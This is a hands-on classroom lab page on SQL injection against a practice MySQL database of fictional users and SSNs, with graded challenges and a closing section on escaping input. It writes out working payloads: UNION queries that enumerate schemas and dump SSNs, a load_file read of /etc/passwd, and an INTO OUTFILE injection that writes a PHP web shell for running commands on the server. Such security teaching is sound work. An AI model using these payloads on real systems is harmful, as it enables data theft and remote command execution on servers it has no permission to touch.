Project 16: SQL Injection (15 pts. + 15 pts. extra)

Introduction to SQL Injection: Hands-On

1. Reset the Database Before Using It

2. Understanding SQL Database Structure

The database named sqlol contains the two tables shown below.

Table: users

Field: usernameField: isadmin
Herp Derper1
SlapdeBack LovedeFace1
Wengdack Slobdegoob0
Chunk MacRunfast0
Peter Weiner0
    

Table: ssn

Field: nameField: ssn
Herp Derper111-11-1111
SlapdeBack LovedeFace222-22-2222
Wengdack Slobdegoob333-33-3333
Chunk MacRunfast444-44-4444
Peter Weiner555-55-5555

Important Terms

Database -- an object that contains Tables
Table -- an object that contains Fields
Field -- an item of data, such as a name or ssn

3. SQL SELECT Queries

SQL uses easily-understood commands like SELECT, UPDATE, and DELETE. Try the queries below to see how SELECT works.

Query:      

Try These SELECT Queries

SELECT * FROM sqlol.users Get all fields from the table "sql.users"
SELECT * FROM sqlol.ssn Get all fields from the table "sql.ssn"
SELECT name FROM sqlol.ssn Get field "name" from the table "sql.ssn"
SELECT ssn as name FROM sqlol.ssn Get field "ssn" from the table "sql.ssn" and change its field name to "name"
SELECT * FROM sqlol.ssn WHERE name='Herp Derper' Get all fields from the table "sql.ssn" with the "name" field equal to "Herp Derper"
SELECT * FROM sqlol.ssn WHERE name='Fred' Get all fields from the table "sql.ssn" with the "name" field equal to "Fred"
SELECT * FROM sqlol.users WHERE isadmin=0 Get all fields from the table "sql.ssn" with the "isadmin" field equal to 0
SELECT * FROM sqlol.ssn WHERE name='Fred' OR 'a'='a' Get all fields from the table "sql.ssn" (the condition is always true)
SELECT username FROM sqlol.users UNION SELECT ssn AS username FROM sqlol.ssn Combine data from two tables

Writing to a File

SELECT "Literal text" into outfile '/tmp/test1.htm' Put literal text into a file (you'll need to change the filename to something that hasn't been used yet)
Files will be visible at https://attack.samsclass.info/tmp/test1.htm
ty @faisal_hfr

Reading From a File

SELECT load_file('/etc/passwd') FROM sqlol.users Reads from a local file

16.1: User Accounts (5 pts.)

Find the SQL query in the list above that exposes a list of all the users on the server, including "root".

Enter that query into the form below.

Use the form below to record your score in Canvas.

If you don't have a Canvas account, see the instructions here.

Name or Email:
SQL query:

4. Search for Usernames

Websites don't usually let you type in complete SQL queries, but only fields like usernames and passwords.

Attackers can sneak SQL commands in by using special characters like apostrophes.

Try the usernames below in this form to see how it works.

Name:      

Performs This Query:

SELECT username FROM users WHERE username LIKE 'name'

Try These Usernames

Find User

Herp Derper

Detect Vulnerability

Mike O'Neil

Find Database Names

' UNION SELECT table_schema AS username FROM information_schema.tables WHERE 'a'='a

Find Tables in sqlol Database

' UNION SELECT table_name AS username FROM information_schema.tables WHERE table_schema='sqlol

Find Columns within ssn Table

' UNION SELECT column_name AS username FROM information_schema.columns WHERE table_name='ssn' AND table_schema='sqlol

Dump Names and SSNs

' UNION SELECT concat(name, ':', ssn) AS username FROM sqlol.ssn WHERE 'a'='a

Upload a PHP Shell

' union select "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/tmp/shell.php' #

You'll need to use a new filename, such as "/tmp/YOURNAMEshell.php"

To use the shell, use a URL like https://attack.samsclass.info/tmp/shell.php?cmd=ls

16.2: whoami (10 pts.)

Put a PHP shell on the server, and use it to execute the Linux command whoami

This command returns your user name. Enter the result into the form below.

Use the form below to record your score in Canvas.

If you don't have a Canvas account, see the instructions here.

Name or Email:
User name:

16.3: Find the flag (15 pts. extra credit)

There's a flag in the MySQL stored data. Find it and use the form below to record your score in Canvas.

If you don't have a Canvas account, see the instructions here.

Name or Email:
Flag:

5. Safer Search with Input Validation

The simplest defense is to encode special characters.

This stops many common SQL injection attacks with a single line of code.

Try the usernames above in this form:

Name:      

Performs This Query:

SELECT username FROM users WHERE username LIKE 'name'

Uses mysql_real_escape_string to Encode Special Characters

Thanks to

@Faisal_HFR for using SELECT "Literal text" into outfile, a much better way to get onto the winners page than I used.

@bcrook88 for injecting JavaScript onto the winners page twice, so I added input filtering and more strict apparmor rules to MySQL to stop it.

@bcrook88 for uploading a PHP shell that let him execute arbitrary bash commands, inspiring challenge 6.

Sources

Based on SQLol from SpiderLabs.
SQL Injection Modify / Insert Table Values
Hackproofing MySQL (from 2004)
Hackproofing MySQL (alternative download link)
MySQL SUBSTRING() function
MySQL - Concatenation
Creating Metasploit Payloads
Exploiting PHP Vulnerabilities
Useful SQL Injections
Getting around "su : must be run from a terminal"


Last modified 8-23-18 3:28 am